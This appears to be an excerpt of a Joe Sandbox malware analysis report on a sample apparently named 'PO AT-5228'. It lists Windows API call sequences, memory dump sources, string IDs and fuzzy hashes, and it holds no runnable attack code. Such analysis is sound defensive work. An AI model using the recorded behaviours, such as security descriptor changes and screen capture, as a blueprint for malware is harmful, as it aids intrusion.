                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00BCF4AA
                                                                                        • DragFinish.SHELL32(?), ref: 00BCF4B1
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BCF59C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                        • API String ID: 169749273-3440237614
                                                                                        • Opcode ID: 2b81ed6905397b49f2539df2489b048af9b03bc33b4f170c3855a82c877b7264
                                                                                        • Instruction ID: f854e509415feb9d253258e2d959ce3d2334721f3854a737067d1c37006acf57
                                                                                        • Opcode Fuzzy Hash: 2b81ed6905397b49f2539df2489b048af9b03bc33b4f170c3855a82c877b7264
                                                                                        • Instruction Fuzzy Hash: CD616971108301AFC715EF64CC85EAFBBF8EF99710F000A6EF695961A1DB709A09CB52
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00BAAB3D
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00BAAB46
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BAAB52
                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00BAAC40
                                                                                        • __swprintf.LIBCMT ref: 00BAAC70
                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00BAAC9C
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BAAD4D
                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00BAADDF
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BAAE35
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BAAE44
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00BAAE80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                        • API String ID: 3730832054-3931177956
                                                                                        • Opcode ID: ec9755682fe6ee9c732535d45e5c42ba75c84610d63235012568c6a8bdf9dc8d
                                                                                        • Instruction ID: 49364190dda1605ebf651e72ce18b8ea93b5b0f36c6cfabf9ab62d4e23c94008
                                                                                        • Opcode Fuzzy Hash: ec9755682fe6ee9c732535d45e5c42ba75c84610d63235012568c6a8bdf9dc8d
                                                                                        • Instruction Fuzzy Hash: A5D1BD71A08205EBDB209F65C885B7AB7F5FF06B00F2484E5E455AB280DB74AD40DBB2
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00BC71FC
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BC7247
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 62055ffb277534ca094ac7716a47cab63dcbdfd67d3041178514dfe6a6db00da
                                                                                        • Instruction ID: 96ad6191515df25d9e58aa55c300c1f96bb9bbb6c3b1d384692733612765088c
                                                                                        • Opcode Fuzzy Hash: 62055ffb277534ca094ac7716a47cab63dcbdfd67d3041178514dfe6a6db00da
                                                                                        • Instruction Fuzzy Hash: 93915E742446019BCF05EF24C491A6EB7E5EF95310F0488ECF89A5B392DB34ED46DB85
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BCE5AB
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00BC9808,?), ref: 00BCE607
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE647
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE68C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BCE6C3
                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00BC9808,?), ref: 00BCE6CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BCE6DF
                                                                                        • DestroyIcon.USER32(?), ref: 00BCE6EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BCE70B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BCE717
                                                                                          • Part of subcall function 00B80FA7: __wcsicmp_l.LIBCMT ref: 00B81030
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 1212759294-1154884017
                                                                                        • Opcode ID: efe3bd18e1e5fea1389c9393180b4aacb0a0c255302c4b0ddd3ff6af0c292059
                                                                                        • Instruction ID: b38ca756e2582e34ad04099acaf3bbe91e86203fca0b66cbd644a1fc9c899f36
                                                                                        • Opcode Fuzzy Hash: efe3bd18e1e5fea1389c9393180b4aacb0a0c255302c4b0ddd3ff6af0c292059
                                                                                        • Instruction Fuzzy Hash: 3661AF71610215FAEB14AF64CC86FAA7BE8FB18754F104259F925DB1D0EBB4D980CB60
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00BAD292
                                                                                        • GetDriveTypeW.KERNEL32 ref: 00BAD2DF
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD327
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD35E
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BAD38C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1148790751-4113822522
                                                                                        • Opcode ID: b4d5a92cab0dcca28c7e962692dae3c47705a2978474f2c2e9f54dfa25cf4305
                                                                                        • Instruction ID: bc36bb916fc4986f46694947e106c5e0584dc3e3b2881ce05c013283d6cbd533
                                                                                        • Opcode Fuzzy Hash: b4d5a92cab0dcca28c7e962692dae3c47705a2978474f2c2e9f54dfa25cf4305
                                                                                        • Instruction Fuzzy Hash: 5C512B711043459FC700EF24C88196EB7F8EF99758F0089ADF89AA7261DB35EE06DB52
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00BD3973,00000016,0000138C,00000016,?,00000016,00BFDDB4,00000000,?), ref: 00BA26F1
                                                                                        • LoadStringW.USER32(00000000,?,00BD3973,00000016), ref: 00BA26FA
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00BD3973,00000016,0000138C,00000016,?,00000016,00BFDDB4,00000000,?,00000016), ref: 00BA271C
                                                                                        • LoadStringW.USER32(00000000,?,00BD3973,00000016), ref: 00BA271F
                                                                                        • __swprintf.LIBCMT ref: 00BA276F
                                                                                        • __swprintf.LIBCMT ref: 00BA2780
                                                                                        • _wprintf.LIBCMT ref: 00BA2829
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BA2840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 618562835-2268648507
                                                                                        • Opcode ID: 9bb7e9110acf2a9ab8ccf912c2cce33474497e151b67151937b1f11eefa31768
                                                                                        • Instruction ID: e8000ea02d24014918ac9734ae7feb22067e349af1d6f255a9b831530d571f64
                                                                                        • Opcode Fuzzy Hash: 9bb7e9110acf2a9ab8ccf912c2cce33474497e151b67151937b1f11eefa31768
                                                                                        • Instruction Fuzzy Hash: CB415E72800209BACF14FBE4DD86EEEB7B8AF16340F1000A5B50577092EE796F59DB61
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BAD0D8
                                                                                        • __swprintf.LIBCMT ref: 00BAD0FA
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BAD137
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BAD15C
                                                                                        • _memset.LIBCMT ref: 00BAD17B
                                                                                        • _wcsncpy.LIBCMT ref: 00BAD1B7
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BAD1EC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAD1F7
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00BAD200
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAD20A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        • Opcode ID: 359f0c370a513858ec6d43e5273f766cb4b368987c088c754516617ee4e22ea0
                                                                                        • Instruction ID: 28f9f05359cf0d94777aace6c29f7dd72446437ae0b8921aaadc2883702e1c9c
                                                                                        • Opcode Fuzzy Hash: 359f0c370a513858ec6d43e5273f766cb4b368987c088c754516617ee4e22ea0
                                                                                        • Instruction Fuzzy Hash: A5316FB250424AABDB21DFA4DC89FAB77FCEF89740F1041B6F50AD6160EA709645CB24
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                        • String ID:
                                                                                        • API String ID: 884005220-0
                                                                                        • Opcode ID: 7f0f1c5b8a72be5813d1a2c913ab5a33ac5eca2a2f13b92b5f4ccec50141ab55
                                                                                        • Instruction ID: 8f296b2da9959aee61bb2661cb79ad128402d786ae72650b4a7f4643487b5995
                                                                                        • Opcode Fuzzy Hash: 7f0f1c5b8a72be5813d1a2c913ab5a33ac5eca2a2f13b92b5f4ccec50141ab55
                                                                                        • Instruction Fuzzy Hash: 3761B172900215AFDF216F64DC82B6D37E8EB12761F2045BAE801AB1D2DF34D942CBA5
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00BCE754
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00BCE76B
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00BCE776
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BCE783
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BCE78C
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BCE79B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BCE7A4
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BCE7AB
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00BCE7BC
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BED9BC,?), ref: 00BCE7D5
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BCE7E5
                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00BCE809
                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00BCE834
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BCE85C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BCE872
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3840717409-0
                                                                                        • Opcode ID: 885004bd41d0f0d8584422853e352572b74dec804af27d0555adab2136b44eec
                                                                                        • Instruction ID: a7120316146fed6ff0a18c5b6d4a019fb76f8b0ada73619d6541b74d1a6cfd60
                                                                                        • Opcode Fuzzy Hash: 885004bd41d0f0d8584422853e352572b74dec804af27d0555adab2136b44eec
                                                                                        • Instruction Fuzzy Hash: 50413775600244EFDB119F65DC88EAA7BB8EF89711F108098F916EB2A0DB75ED41DB20
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 00BB076F
                                                                                        • _wcscat.LIBCMT ref: 00BB0787
                                                                                        • _wcscat.LIBCMT ref: 00BB0799
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB07AE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB07C2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00BB07DA
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00BB07F4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        • API String ID: 34673085-438819550
                                                                                        • Opcode ID: a3563cf3d4b45e83da25be50a68cf34b62c135f0f9b3342a9dd97f697fe4a549
                                                                                        • Instruction ID: baf029750231d3ff274e3477bd9f632828f334114c3f3b1fd8d209c62e34ce39
                                                                                        • Opcode Fuzzy Hash: a3563cf3d4b45e83da25be50a68cf34b62c135f0f9b3342a9dd97f697fe4a549
                                                                                        • Instruction Fuzzy Hash: 298193715143419FCB24EF24C8859BFB7D8EB94304F1488AEF88AD7250EAB4D944CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BCEF3B
                                                                                        • GetFocus.USER32 ref: 00BCEF4B
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00BCEF56
                                                                                        • _memset.LIBCMT ref: 00BCF081
                                                                                        • GetMenuItemInfoW.USER32 ref: 00BCF0AC
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00BCF0CC
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00BCF0DF
                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00BCF113
                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00BCF15B
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BCF193
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BCF1C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1296962147-4108050209
                                                                                        • Opcode ID: c2069bbf0a5d4b8817fa1bc3628c0d2cd7d14cb2f55b559c049fc1f7e16c8359
                                                                                        • Instruction ID: 1b2044b9ee83158025d2768bae8621186b1c98e89c371b10595e70a14c0ccafe
                                                                                        • Opcode Fuzzy Hash: c2069bbf0a5d4b8817fa1bc3628c0d2cd7d14cb2f55b559c049fc1f7e16c8359
                                                                                        • Instruction Fuzzy Hash: C7816B71604342EFDB20CF15C884FBABBEAEB88714F1445AEF99497291D770D905CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                                                          • Part of subcall function 00B9ABBB: GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                                                          • Part of subcall function 00B9ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                                                          • Part of subcall function 00B9ABBB: HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                                                          • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                                                          • Part of subcall function 00B9AC56: GetProcessHeap.KERNEL32(00000008,00B9A6B5,00000000,00000000,?,00B9A6B5,?), ref: 00B9AC62
                                                                                          • Part of subcall function 00B9AC56: HeapAlloc.KERNEL32(00000000,?,00B9A6B5,?), ref: 00B9AC69
                                                                                          • Part of subcall function 00B9AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B9A6B5,?), ref: 00B9AC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B9A8CB
                                                                                        • _memset.LIBCMT ref: 00B9A8E0
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B9A8FF
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B9A910
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B9A94D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B9A969
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B9A986
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B9A995
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B9A99C
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B9A9BD
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00B9A9C4
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B9A9F5
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B9AA1B
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B9AA2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: 2a8b34053e1036080b22990d5978b3b04daa0a34943a420243ec75f8982ec81b
                                                                                        • Instruction ID: 0006826b26fcbeee3bae80ce43edf7f01545b923476b9423f5ba8328476eabe5
                                                                                        • Opcode Fuzzy Hash: 2a8b34053e1036080b22990d5978b3b04daa0a34943a420243ec75f8982ec81b
                                                                                        • Instruction Fuzzy Hash: 2E517F71900209AFDF10DF94DD99EEEBBB9FF04300F048169F911AB291DB759A06CBA1
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00BB9E36
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BB9E42
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00BB9E4E
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00BB9E5B
                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BB9EAF
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00BB9EEB
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BB9F0F
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00BB9F17
                                                                                        • DeleteObject.GDI32(?), ref: 00BB9F20
                                                                                        • DeleteDC.GDI32(00000006), ref: 00BB9F27
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00BB9F32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 165c0e55a5a141d56970d5c8a8adf1f9fca0d647b17bd9923cae1ab43c4023ea
                                                                                        • Instruction ID: 57565cfc9fc87b681df4d9144b724f7ce7f42629dfd6cd5e1bf50d0242434d1b
                                                                                        • Opcode Fuzzy Hash: 165c0e55a5a141d56970d5c8a8adf1f9fca0d647b17bd9923cae1ab43c4023ea
                                                                                        • Instruction Fuzzy Hash: 45513975900349AFCB14CFA8C885EAEBBF9EF48310F14885DF95AAB210C775A941CB50
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-2391861430
                                                                                        • Opcode ID: 14b2aaf78f4cc1c626ed371e9e37ba078592ba666313ec92576276c59069cf38
                                                                                        • Instruction ID: 46fee02570509839355b4bf0b4a93089c542c1f8e07012cd6a4247d6bc3ca095
                                                                                        • Opcode Fuzzy Hash: 14b2aaf78f4cc1c626ed371e9e37ba078592ba666313ec92576276c59069cf38
                                                                                        • Instruction Fuzzy Hash: D3517E71900109BACF25EBE4CD46EEEBBB8EF1A304F1001A5F505720A2EB756F59DB61
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
